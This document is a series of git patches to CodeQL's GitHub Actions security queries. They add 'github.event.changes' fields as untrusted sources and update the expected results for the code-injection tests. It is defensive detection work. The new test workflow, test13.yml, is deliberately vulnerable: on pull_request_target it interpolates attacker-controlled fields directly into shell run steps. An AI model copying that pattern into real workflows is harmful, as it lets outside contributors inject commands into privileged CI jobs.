| Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | From e147a0bc710d449b0f05be16a2081beaca4744e9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 25 Sep 2024 15:26:31 +0200 Subject: [PATCH 539/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a8a194c52ba6..ecde4c83b206 100644 
--- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.53 +version: 0.1.54 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e4cb89696496..cddb4f61bf65 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.53 +version: 0.1.54 groups: [actions, queries] suites: codeql-suites extractor: javascript From 16f1a53584a63b8c101a25b91fe5ac1eb09a0ec0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 25 Sep 2024 18:21:54 +0200 Subject: [PATCH 540/707] Add new sources for github.event.changes --- ql/lib/ext/config/context_event_map.yml | 14 ++++++++++++++ .../ext/config/untrusted_event_properties.yml | 4 ++++ .../CWE-094/.github/workflows/test13.yml | 14 ++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 19 +++++++++++++++++++ .../CWE-094/CodeInjectionMedium.expected | 14 ++++++++++++++ 5 files changed, 65 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml index e09dab14f2b8..4c2451b5ab85 100644 --- a/ql/lib/ext/config/context_event_map.yml +++ b/ql/lib/ext/config/context_event_map.yml 
@@ -4,34 +4,47 @@ extensions:
 extensible: contextTriggerDataModel
 data:
 - ["commit_comment", "github.event.comment"]
+ - ["commit_comment", "github.event.changes"]
 - ["discussion", "github.event.discussion"]
+ - ["discussion", "github.event.changes"]
 - ["discussion_comment", "github.event.comment"]
 - ["discussion_comment", "github.event.discussion"]
+ - ["discussion_comment", "github.event.changes"]
 - ["issues", "github.event.issue"]
+ - ["issues", "github.event.changes"]
 - ["issue_comment", "github.event.issue"]
 - ["issue_comment", "github.event.comment"]
+ - ["issue_comment", "github.event.changes"]
 - ["gollum", "github.event.pages"]
+ - ["gollum", "github.event.changes"]
 - ["merge_group", "github.event.merge_group"]
 - ["pull_request", "github.event.pull_request"]
 - ["pull_request", "github.head_ref"]
+ - ["pull_request", "github.event.changes"]
 - ["pull_request_comment", "github.event.comment"]
 - ["pull_request_comment", "github.event.pull_request"]
 - ["pull_request_comment", "github.head_ref"]
+ - ["pull_request_comment", "github.event.changes"]
 - ["pull_request_review", "github.event.pull_request"]
 - ["pull_request_review", "github.event.review"]
 - ["pull_request_review", "github.head_ref"]
+ - ["pull_request_review", "github.event.changes"]
 - ["pull_request_review_comment", "github.event.comment"]
 - ["pull_request_review_comment", "github.event.pull_request"]
 - ["pull_request_review_comment", "github.event.review"]
 - ["pull_request_review_comment", "github.head_ref"]
+ - ["pull_request_review_comment", "github.event.changes"]
 - ["pull_request_target", "github.event.pull_request"]
 - ["pull_request_target", "github.head_ref"]
+ - ["pull_request_target", "github.event.changes"]
 - ["push", "github.event.commits"]
 - ["push", "github.event.head_commit"]
+ - ["push", "github.event.changes"]
 - ["repository_dispatch", "github.event.client_payload"]
 - ["workflow_dispatch", "github.event.inputs"]
 - ["workflow_run", "github.event.workflow"]
 - ["workflow_run", "github.event.workflow_run"]
+ - ["workflow_run", "github.event.changes"]
 # workflow_call receives the same event payload as the calling workflow
 - ["workflow_call", "github.event.client_payload"]
 - ["workflow_call", "github.event.comment"]
@@ -46,4 +59,5 @@ extensions:
 - ["workflow_call", "github.event.review"]
 - ["workflow_call", "github.event.workflow"]
 - ["workflow_call", "github.event.workflow_run"]
+ - ["workflow_call", "github.event.changes"]
diff --git a/ql/lib/ext/config/untrusted_event_properties.yml b/ql/lib/ext/config/untrusted_event_properties.yml
index 739544455da7..be2e1c9c7981 100644
--- a/ql/lib/ext/config/untrusted_event_properties.yml
+++ b/ql/lib/ext/config/untrusted_event_properties.yml
@@ -10,6 +10,7 @@ extensions:
 - ["github\\.event\\.pages\\[[0-9]+\\]\\.page_name", "title"]
 - ["github\\.event\\.pages\\[[0-9]+\\]\\.title", "title"]
 - ["github\\.event\\.workflow_run\\.display_title", "title"]
+ - ["github\\.event\\.changes\\.title\\.from", "title"]
 # URL
 - ["github\\.event\\.pull_request\\.head\\.repo\\.homepage", "url"]
 # TEXT
@@ -25,12 +26,14 @@ extensions:
 - ["github\\.event\\.workflow_run\\.head_repository\\.description", "text"]
 - ["github\\.event\\.client_payload\\[[0-9]+\\]", "text"]
 - ["github\\.event\\.client_payload", "text"]
+ - ["github\\.event\\.changes\\.body\\.from", "title"]
 # BRANCH
 - ["github\\.event\\.pull_request\\.head\\.repo\\.default_branch", "branch"]
 - ["github\\.event\\.pull_request\\.head\\.ref", "branch"]
 - ["github\\.event\\.workflow_run\\.head_branch", "branch"]
 - ["github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", "branch"]
 - ["github\\.event\\.merge_group\\.head_ref", "branch"]
+ - ["github\\.event\\.changes\\.head\\.ref\\.from", "branch"]
 # LABEL
 - ["github\\.event\\.pull_request\\.head\\.label", "label"]
 # EMAIL
@@ -79,5 +82,6 @@ extensions:
 - ["github\\.event\\.workflow_run\\.head_commit\\.committer", "json"]
 - ["github\\.event\\.workflow_run\\.head_repository", "json"]
 - ["github\\.event\\.workflow_run\\.pull_requests", "json"]
+ - ["github\\.event\\.changes", "json"]
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml
new file mode 100644
index 000000000000..1e5c7eec177d
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml
@@ -0,0 +1,14 @@
+name: Pull Request Open
+
+on:
+ pull_request_target:
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "${{ github.event.changes.body.from }}"
+ - run: echo "${{ github.event.changes.title.from }}"
+ - run: echo "${{ github.event.changes.head.ref.from }}"
+ - run: echo "${{ toJson(github.event.changes) }}"
+
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
index 749d05244153..207fb3abf01b 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
@@ -15,6 +15,7 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | 
@@ -89,8 +90,10 @@ edges | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | 
@@ -170,7 +173,9 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | 
@@ -329,11 +334,15 @@ nodes | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | 
@@ -403,6 +412,10 @@ nodes | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | github.event.changes.head.ref.from | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -444,6 +457,7 @@ subpaths | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | 
@@ -509,6 +523,7 @@ subpaths | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | 
@@ -537,6 +552,10 @@ subpaths | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 3ad4e6915d23..e5ad46888522 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -15,6 +15,7 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | 
@@ -89,8 +90,10 @@ edges | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | 
@@ -170,7 +173,9 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | 
@@ -329,11 +334,15 @@ nodes | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | 